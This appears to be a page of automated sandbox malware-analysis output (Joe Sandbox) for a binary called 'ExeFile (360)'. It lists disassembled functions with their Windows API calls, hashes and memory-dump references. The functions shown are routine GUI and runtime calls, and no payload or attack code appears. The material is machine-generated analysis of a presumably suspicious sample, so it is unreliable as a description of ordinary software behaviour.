API String ID: 2888839504-0
Opcode ID: d391228ac4a547ee51617c128b7faf94af2cc528aa7110d72afdb60bec2a2cea
Instruction ID: 691f6b2eda0fe24aeec19dbd8ca97c1fe985d7664d1f9747af38378d8dce2b2d
Opcode Fuzzy Hash: d391228ac4a547ee51617c128b7faf94af2cc528aa7110d72afdb60bec2a2cea
Instruction Fuzzy Hash: 5721A172A00319ABEB24DFA5CD81BAAB7B9EF14354F00092EEA65D2290D3B89944C714

Function 004252AF Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,0042111F,0041B374,00000000,?,?,0041B1E7,00000000), ref: 004252DE
MultiByteToWideChar.KERNEL32(?,00000009,0041B1E7,?,00000000,00000000,?,0042111F,0041B374,00000000,?,?,0041B1E7,00000000), ref: 004252F1
MultiByteToWideChar.KERNEL32(?,00000001,0041B1E7,?,?,00000000,?,0042111F,0041B374,00000000,?,?,0041B1E7,00000000), ref: 0042533D
CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,0042111F,0041B374,00000000,?,?,0041B1E7,00000000), ref: 00425355

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: 731e5a1ce59dd5057ab31c9c961a87d67c87b5e6463bc89ad6954979043a4952
Instruction ID: 35c2db33565eae230cf8236800ad585d5ff7be72369d125c2276cc63233f645a
Opcode Fuzzy Hash: 731e5a1ce59dd5057ab31c9c961a87d67c87b5e6463bc89ad6954979043a4952
Instruction Fuzzy Hash: AA215B32900619EFCF218F84DC419DEBFB1FF48790F14412AFA1072160D3769A61DB94

Function 00436782 Relevance: 6.1, APIs: 4, Instructions: 66timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004367FE
GetLastError.KERNEL32(00000000), ref: 0043680F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0043681E
GetLastError.KERNEL32(00000000), ref: 00436829

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Time$File$ErrorLast$LocalSystem
String ID:
API String ID: 1172841412-0
Opcode ID: 291dd8d89fb6f956247cb878c9fa8652b107f13b9b4a5ec698d87b1f51709a05
Instruction ID: 1b20c6d3215b73bf86f01f5e97106a9ee2a5205574ad59616a2f7e4c8d95bcb8
Opcode Fuzzy Hash: 291dd8d89fb6f956247cb878c9fa8652b107f13b9b4a5ec698d87b1f51709a05
Instruction Fuzzy Hash: 4411D319A10225B68F00BFEA88458EFB7BDAF88384B41404BF425D7222EA74D541CBEC

Function 00428B20 Relevance: 6.1, APIs: 4, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetPropA.USER32(?,00000000), ref: 00428B5D
SendMessageA.USER32(?,00001944,00000000,?), ref: 00428B82
SendMessageA.USER32(?,00001943,00000000,?), ref: 00428B97
RemovePropA.USER32(?,00000000), ref: 00428BAD

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessagePropSend$Remove
String ID:
API String ID: 2793251306-0
Opcode ID: 46485b17b7b2b2b5f9dd94e2b899bbda3714b725b7ff99310c4e7070240b44ee
Instruction ID: 05d6bb60280221ef238b5cb23465a6d5b72d1c77452a0f3c6461d36364c03000
Opcode Fuzzy Hash: 46485b17b7b2b2b5f9dd94e2b899bbda3714b725b7ff99310c4e7070240b44ee
Instruction Fuzzy Hash: 331151A96017157EE210AB11BC05FBF739CEF98765F40443DFD1492281E678A90A8BAF

Function 0040A750 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

InflateRect.USER32(000000FF,000000FF,000000FF), ref: 0040A786
DrawEdge.USER32(?,?,00000002,0000000F), ref: 0040A7A2
InflateRect.USER32(?,00000002,00000002), ref: 0040A7B1
OffsetRect.USER32(?,00000001,00000002), ref: 0040A7C4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Inflate$DrawEdgeOffset
String ID:
API String ID: 2527967437-0
Opcode ID: 9d9408c019b677ebb35b9ccc371bce574f75e2ecbe9b06b9c81f906522568c2f
Instruction ID: a4fc6c85248bd14d08281fdc4888ae5ae08e46eecfc9f5c2a874d6b10e041c05
Opcode Fuzzy Hash: 9d9408c019b677ebb35b9ccc371bce574f75e2ecbe9b06b9c81f906522568c2f
Instruction Fuzzy Hash: C2112C75204301AFD314DF14C885E6BB3E9ABC8724F448A2EF1559B2D1D674E905CB96

Function 0044F107 Relevance: 6.1, APIs: 4, Instructions: 64windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044F10C

Part of subcall function 00434010: lstrlenA.KERNEL32(?), ref: 00434054

wsprintfA.USER32 ref: 0044F16D
wsprintfA.USER32 ref: 0044F183
SendMessageA.USER32(?,00000362,00000000,?), ref: 0044F19D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: wsprintf$H_prologMessageSendlstrlen
String ID:
API String ID: 443212507-0
Opcode ID: 73b5fffc9b6ba8a8ea9435fba73ec48e325759500f47eb1b36c5fc5eb325bf49
Instruction ID: bad21058687b82ce59215c72d8edabe6fcf2695dd91f84d6388fdfd0b76d4ba4
Opcode Fuzzy Hash: 73b5fffc9b6ba8a8ea9435fba73ec48e325759500f47eb1b36c5fc5eb325bf49
Instruction Fuzzy Hash: 11213B76A00208EFDB11DFA8CC45ADEBBB9FB48355F10852AF919DB251E734DA088B54

Function 0044C46A Relevance: 6.1, APIs: 4, Instructions: 61stringwindowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044C46F
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,00000000,00000000,00000000,00000000,?,00464730,00000000,?,0044DC68,00000000), ref: 0044C4DF
lstrcpynA.KERNEL32(0044DC68,00000000,?,?,00464730,00000000,?,0044DC68,00000000,?,?,?,?,00000000), ref: 0044C4FB
LocalFree.KERNEL32(00000000,?,00464730,00000000,?,0044DC68,00000000,?,?,?,?,00000000), ref: 0044C504

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: FormatFreeH_prologLocalMessagelstrcpyn
String ID:
API String ID: 1069405352-0
Opcode ID: 1c3e3e618c4d6b49d84a519a113bea88ce069a82ba599525a317ac438bc9ffff
Instruction ID: e31bba8fb1285a7f65d7b49683111e96205cf4e0b0ea6e254f10f487519d1b1c
Opcode Fuzzy Hash: 1c3e3e618c4d6b49d84a519a113bea88ce069a82ba599525a317ac438bc9ffff
Instruction Fuzzy Hash: 6711EF32200318BFEB11DF94CC81AEF7BA8EF04795F20842BF909CA190D3B49940CB98

Function 00441A73 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,?,?), ref: 00441A9C
OffsetRect.USER32(?,?,?), ref: 00441AA6
OffsetRect.USER32(?,?,?), ref: 00441AB0
OffsetRect.USER32(?,?,?), ref: 00441ABA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: e84167e8655941b56b34c0c8af7f86d02e9eb2e78f0a4b6cb86ac6db27c643fa
Instruction ID: ab2a29a26e4f26f8e0032b5c385627991667f16e9ef3ea21fc4deaa824576797
Opcode Fuzzy Hash: e84167e8655941b56b34c0c8af7f86d02e9eb2e78f0a4b6cb86ac6db27c643fa
Instruction Fuzzy Hash: 7C110971600749BFDB10DFAAC984D9BB7EDEB48758B00482EF54AD3610D6B4FE408B64

Function 00443A0B Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

GetForegroundWindow.USER32 ref: 00443A2F
GetLastActivePopup.USER32(?), ref: 00443A4A
SendMessageA.USER32(?,0000036D,00000040,00000000), ref: 00443A66
SendMessageA.USER32(?,0000036D,-00000007,00000000), ref: 00443A87

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageSendWindow$ActiveForegroundLastLongPopup
String ID:
API String ID: 2039223353-0
Opcode ID: cdf1b133a88a98a05254bc53448212b70079ed7fea627e4e1b84f5cb7d0c2f79
Instruction ID: 6eba6e8118db38450e31823bfbf5938770217768d75196513093759da209dccc
Opcode Fuzzy Hash: cdf1b133a88a98a05254bc53448212b70079ed7fea627e4e1b84f5cb7d0c2f79
Instruction Fuzzy Hash: 670126727C07157AFA203E71AC52F3F72098B44B52F000937FA42E62D2DA6DDD41415C

Function 00428BD1 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00428BF3
GetWindow.USER32(00000000,00000005), ref: 00428C0F
GetWindow.USER32(00000000,00000002), ref: 00428C25
GetWindow.USER32(00000000,00000002), ref: 00428C30

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 8997c26e6ad1e0f64ab52bbf1ca676ffaec4232aab7be1e84b0dbd88446cf25b
Instruction ID: 8900dd6c8c147523a622931a21a469d8d39196e4b200192ae026b1a832081c40
Opcode Fuzzy Hash: 8997c26e6ad1e0f64ab52bbf1ca676ffaec4232aab7be1e84b0dbd88446cf25b
Instruction Fuzzy Hash: 06F0A96734671526D221656A3C96F6FBB588BD1B61F90003FF20096283FE55E8058279

Function 00428190 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CallNextHookEx.USER32(00000000,?,?,?), ref: 004281AB
UnhookWindowsHookEx.USER32(00000000), ref: 004281C4
GetWindowLongA.USER32(?,000000F0), ref: 004281DB
SendMessageA.USER32(00000001,000011F0,00000000,00000001), ref: 00428205

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Hook$CallLongMessageNextSendUnhookWindowWindows
String ID:
API String ID: 4187046592-0
Opcode ID: a0a6f581972b1a79230e5808094e586305e96a485f6f17c4fbb7f907c166d662
Instruction ID: 1c4f21adb06f6490f104404f0ceb0db49362a183ed976667b291196dfa806b78
Opcode Fuzzy Hash: a0a6f581972b1a79230e5808094e586305e96a485f6f17c4fbb7f907c166d662
Instruction Fuzzy Hash: 15114CB5A00700AFD310CB28EC48E6B77E9BB98311F40842DF555C72A0EBB5E844CB1A

Function 004401B6 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetDlgCtrlID.USER32(?), ref: 004401C5
GetScrollPos.USER32(?,00000002), ref: 004401D9
SendMessageA.USER32(?,00000114,?,?), ref: 0044021B
SetScrollPos.USER32(?,00000002,?,00000000), ref: 00440234

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Scroll$CtrlMessageSend
String ID:
API String ID: 1219558039-0
Opcode ID: 792321f8db70c2a00fa4bc124fdc5c267e2dd3a865c48aa7edb8c10029123dfb
Instruction ID: d1e67177872c43a942aa798861660c9a3ed50035f929a6dc0b42870eee72bbbe
Opcode Fuzzy Hash: 792321f8db70c2a00fa4bc124fdc5c267e2dd3a865c48aa7edb8c10029123dfb
Instruction Fuzzy Hash: 84113D31500309EFDF109F55DC49AAA7BB5FB04352F10842AF9059A1A1D7B5D960DB54

Function 0044024C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetDlgCtrlID.USER32(?), ref: 0044025B
GetScrollPos.USER32(?,00000002), ref: 0044026F
SendMessageA.USER32(?,00000115,?,?), ref: 004402B1
SetScrollPos.USER32(?,00000002,?,00000000), ref: 004402CA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Scroll$CtrlMessageSend
String ID:
API String ID: 1219558039-0
Opcode ID: 9697ebcca7eb79f1fe39263ed829a34a511af344ea9ba5e3b2c215a4ba74f31e
Instruction ID: 14270f59e92d21706b369e93b66cd2831b496e2d09c937ce0edcc54b945485c4
Opcode Fuzzy Hash: 9697ebcca7eb79f1fe39263ed829a34a511af344ea9ba5e3b2c215a4ba74f31e
Instruction Fuzzy Hash: 8B113A31200709EFEB119F15DC89AAA7BB5FF04352F00846AF9029A2A2D3B5E964DB54

Function 00428CC1 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00428CF5
GetWindowLongA.USER32(?,000000F0), ref: 00428D02
SetTextColor.GDI32(?,00000000), ref: 00428D1F
SetBkColor.GDI32(?,00000000), ref: 00428D2D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ColorWindow$LongText
String ID:
API String ID: 3945788684-0
Opcode ID: 02d11fd0a5b23c1063394af71405b6605bb7b68fdae1c8094d31ebe0e3a7a4d8
Instruction ID: 14287b299d68b74f8b53ffbabb828330c7714ca47aebf79985d2a2d2e6ed85fe
Opcode Fuzzy Hash: 02d11fd0a5b23c1063394af71405b6605bb7b68fdae1c8094d31ebe0e3a7a4d8
Instruction Fuzzy Hash: 6F01497631B6204BDB20D724BC58AEF7754EBA1321B40493FE080C31D0DA19A945C66E

Function 00428670 Relevance: 6.1, APIs: 4, Instructions: 52threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00428676
EnterCriticalSection.KERNEL32(0046F280), ref: 00428683
UnhookWindowsHookEx.USER32(?), ref: 004286C6
LeaveCriticalSection.KERNEL32(0046F280), ref: 0042870B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
String ID:
API String ID: 1197249173-0
Opcode ID: 4e05fe1fbf0107c5ebbc2f9cf121c121a8eebf44b3f3f43473a8f9b5963ec374
Instruction ID: 366c1a7ddcae50ffbc9a99069cf036d6a2445b2a41fae14693b28d4c20fb858e
Opcode Fuzzy Hash: 4e05fe1fbf0107c5ebbc2f9cf121c121a8eebf44b3f3f43473a8f9b5963ec374
Instruction Fuzzy Hash: A711C1342427158FC7109F54F854A2A73A5FB00701F5040BFE892C3622FBBAA898CF5E

Function 00434FB7 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00434FEB
GetCurrentProcess.KERNEL32(?,00000000), ref: 00434FF1
DuplicateHandle.KERNEL32(00000000), ref: 00434FF4
GetLastError.KERNEL32(00000000), ref: 0043500E

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: 4aa6a2011589d73e9226a8f7bef62ce378fd9d7615ff06e2d071ed74baa2d1a4
Instruction ID: a6051b366a3c8e0d0a53710bc8c6fb67212894c729eb2ab00d628705f9008fb1
Opcode Fuzzy Hash: 4aa6a2011589d73e9226a8f7bef62ce378fd9d7615ff06e2d071ed74baa2d1a4
Instruction Fuzzy Hash: 7F018835700304BBEB109BA6DC49F6A77ACEF88755F144166F515CB2C2D6A4EC008B64

Function 0044E0BE Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044E0C3
LoadCursorA.USER32(00000000,00007F00), ref: 0044E12D
SetCursor.USER32(00000000), ref: 0044E134
DestroyCursor.USER32(00000000), ref: 0044E13C

Part of subcall function 0044FCB0: __EH_prolog.LIBCMT ref: 0044FCB5
Part of subcall function 0044FCB0: DeleteDC.GDI32(?), ref: 0044FCD6

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Cursor$H_prolog$DeleteDestroyLoad
String ID:
API String ID: 2398634004-0
Opcode ID: 62ca1bf25763427b5a679e574110685af601d598c3a2f82c08f3327d41f0bee1
Instruction ID: 9fd7be31fa46b5bc1478abccb362ca97a80f4a121d3019c6d524b47b2a7275c3
Opcode Fuzzy Hash: 62ca1bf25763427b5a679e574110685af601d598c3a2f82c08f3327d41f0bee1
Instruction Fuzzy Hash: EA11E031200B10DBE715AB25D8067AEB7B5BF44705F40442EE06697292CFB86844CB18

Function 0040A8E0 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

ImageList_GetIcon.COMCTL32(?,?,00000000,00000000,00000000,00000000,00409381,?,?,?), ref: 0040A902
ImageList_GetIconSize.COMCTL32(?,?,?), ref: 0040A918

Part of subcall function 0042D81A: ImageList_Create.COMCTL32(?,?,?,?,?), ref: 0042D82F

ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000), ref: 0040A93F
DestroyCursor.USER32(00000000), ref: 0040A946

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
